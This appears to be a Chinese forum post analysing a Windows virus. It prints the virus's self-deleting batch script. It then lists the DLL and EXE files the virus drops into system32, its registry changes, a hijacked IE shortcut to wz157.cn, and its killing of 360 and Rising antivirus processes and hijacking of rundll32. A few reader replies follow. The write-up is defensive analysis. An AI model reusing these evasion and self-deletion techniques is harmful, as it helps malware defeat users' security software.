@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@del 575.aqq
@del "C:\Documents and Settings\Robey\桌面\新建文件夹\复件 123.exe"
@del 375O540.bat
@exit
总结:
1、病毒创建文件
此病毒为变形病毒,每次运行后释放的dll文件会有所不同。但释放的病毒体是一个名字。
%SystemRoot%\system32\zrrs1.dll <-------|
%SystemRoot%\system32\dllcache\zrrs1.dll <-------|----->每次运行后这三个文件的文件名是不同的。
%SystemRoot%\system32\iksii.dll(报毒Dll) <-------|
%SystemRoot%\system32\xxggyu.exe(释放的病毒体)
D:\ssshall(属性为只读,隐藏,系统文件)
2、病毒修改注册表信息
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Softfy
3、病毒分析
桌面上添加了一个IE图标,网址指向http://www.wz157.cn,创建注册文件,锁定IE从自身释放文件到系统目录下。并设置文件的属性为只读、隐藏、系统文件。遍历进程,查找360tray.exe、ravmond.exe(瑞星)找到则干掉,劫持rundll32.exe进程,并不断的向外请求连接。最后从自身释放批处理文件,然后将自身删除。
云。。。 看不懂 {:1_921:} 虽然看不懂,但支持了,楼主辛苦! 支持楼主 回复 正过来念是猪 的帖子
云 ??啥??
页:
[1]